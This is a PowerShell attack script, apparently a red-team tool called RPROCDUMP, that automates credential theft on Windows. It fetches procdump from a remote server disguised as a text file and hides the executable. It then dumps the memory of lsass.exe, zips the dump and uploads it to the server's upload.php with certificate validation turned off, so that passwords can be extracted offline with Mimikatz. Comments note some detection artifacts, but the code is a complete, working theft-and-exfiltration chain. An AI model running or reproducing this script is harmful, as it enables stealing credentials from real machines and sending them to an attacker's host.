<#
RPROCDUMP - Remote process dumping automation.
Use it to dump remotely all windows credentials and extract clear text with Mimikatz offline
Help:
Edit parameters in procdump.ps1 and run Rprocdump.ps1 with same parameters:
example:
RProcdump -server http://127.0.0.1 -login administrator -pass password123
Author: @ThebenyGreen
- EyesOpenSecurity
#>
# Script-scope settings read by zip, Exfiltrate and ProccessDumpCommand below.
# $server: base URL; the functions append /proc32.txt, /proc64.txt and /upload.php to it.
[string] $server = "http://127.0.0.1"
# $process: process name substituted into the proc.exe command line (-ma argument) in ProccessDumpCommand.
[string] $process="lsass.exe"
# $dumpfile: the bare word runs the `hostname` command; its output names the .dmp and .zip files.
[string] $dumpfile = hostname
# $pshversion: major PowerShell version, used by zip to choose between ZipFile and Compress-Archive.
[string] $pshversion = $PSVersionTable.psversion.Major
# Archives "$env:userprofile\AppData\dump" into "$env:userprofile\AppData\$dumpfile.zip".
# Globals: $pshversion (read), $dumpfile (read).
# Outputs: a .zip file written under the current user's AppData directory.
Function zip{
if ($pshversion -lt 3) {
# Major version below 3: load the .NET compression assembly and call ZipFile.CreateFromDirectory directly.
Add-Type -assembly "system.io.compression.filesystem"
[io.compression.zipfile]::CreateFromDirectory("$env:userprofile\AppData\dump", "$env:userprofile\AppData\$dumpfile.zip")
}
else {
# Major version 3 or higher: use the Compress-Archive cmdlet, then pause 5 seconds before returning.
Compress-Archive -path "$env:userprofile\AppData\dump" -destinationpath "$env:userprofile\AppData\$dumpfile.zip"
Start-sleep -Seconds 5
}
}
# Builds the archive via zip and uploads it to "$server/upload.php" with WebClient.UploadFile.
# Globals: $server (read), $dumpfile (read).
# Side effects: replaces the static ServerCertificateValidationCallback, which applies to every
# later .NET HTTPS request in this process (certificate errors are no longer rejected); sleeps 5 seconds.
# No error handling: a failed zip or upload surfaces only as a terminating exception.
Function Exfiltrate{ # exfiltrate data from victim
# Process-wide: accept any server certificate from here on.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={true};
$http = new-object System.Net.WebClient;
[string] $url="$server/upload.php";
# Create "$env:userprofile\AppData\$dumpfile.zip" from the dump directory.
zip
$Path = "$env:userprofile\AppData\$dumpfile.zip"
Start-sleep -Seconds 5
# Upload of the archive; the server response is discarded.
$http.UploadFile($url,$Path);
}
# Downloads an architecture-specific file from $server, stores it as the hidden file
# "$env:userprofile\AppData\proc.exe", runs it against $process through cmd.exe /C, waits 60 seconds,
# then calls Exfiltrate.
# Globals: $server, $process, $dumpfile (read).
# Side effects: files written under "$env:userprofile\AppData" (proc.exe, dump\<hostname>.dmp);
# on an https $server the process-wide certificate validation callback is replaced.
# Detection-relevant artifacts visible in this function: a WebClient download to AppData, a rename to
# proc.exe, `attrib +h`, a cmd.exe /C child launched via Invoke-Expression, and a .dmp write in AppData\dump.
Function ProccessDumpCommand { # Download and execute Procdump. Dump hash from privileged process. You have to use offline mimikatz to extract password in clear text
# Branch on processor architecture; both branches end with the same local file name, proc.exe.
if($env:PROCESSOR_ARCHITECTURE -eq "x86"){
$downloadURL = "$server/proc32.txt"
[string] $FileOnDisk = "$env:userprofile\AppData\proc32.txt"
# Case-sensitive prefix test (-ceq); for an https URL TLS certificate validation is disabled process-wide.
if ($downloadURL.Substring(0,5) -ceq "https") {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
}
# Two separate WebClient instances: AllowWriteStreamBuffering is set on the first, the download runs on the second.
(New-Object System.Net.WebClient).AllowWriteStreamBuffering = $false
(New-Object System.Net.WebClient).DownloadFile($downloadURL,$FileOnDisk)
rename-item $FileOnDisk -NewName proc.exe
Write-Host "ProcdessDump 32..." -ForegroundColor DarkGreen;
# Hidden attribute set on the dropped executable.
attrib +h "$env:userprofile\AppData\proc.exe"
}
Else{
$downloadURL = "$server/proc64.txt"
[string] $FileOnDisk = "$env:userprofile\AppData\proc64.txt"
# Same prefix test and callback replacement as the x86 branch.
if ($downloadURL.Substring(0,5) -ceq "https") {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
}
(New-Object System.Net.WebClient).DownloadFile($downloadURL,$FileOnDisk)
rename-item $FileOnDisk -NewName proc.exe
Write-Host "ProcessDump 64..." -ForegroundColor DarkGreen
attrib +h "$env:userprofile\AppData\proc.exe"
}
# Ensure "$env:userprofile\AppData\dump" exists; the if branch is empty and the directory is created only when Test-Path fails.
$exists = "$env:userprofile\AppData\dump"
if (Test-Path $exists){ } else {New-Item -Path "$env:userprofile\AppData" -Name "dump" -ItemType "directory" }
# Command line handed to cmd.exe: proc.exe -accepteula -ma <$process> <AppData>\dump\<$dumpfile>.dmp
$cmd = "$env:userprofile\AppData\proc.exe -accepteula -ma $process $env:userprofile\AppData\dump\$dumpfile.dmp"
[string] $CmdPath = "$env:windir\System32\cmd.exe"
[string] $CmdString = "$CmdPath" + " /C " + "$cmd"
# Invoke-Expression evaluates the assembled string as PowerShell, which starts cmd.exe /C with the command above.
Invoke-Expression $CmdString
# Fixed 60-second wait before archiving and uploading the dump directory.
Start-Sleep -Seconds 60
Exfiltrate
}
# Entry point: runs the download -> dump -> upload chain. Exfiltrate is already called at the end of
# ProccessDumpCommand, so the standalone call below is left commented out.
ProccessDumpCommand
#Exfiltrate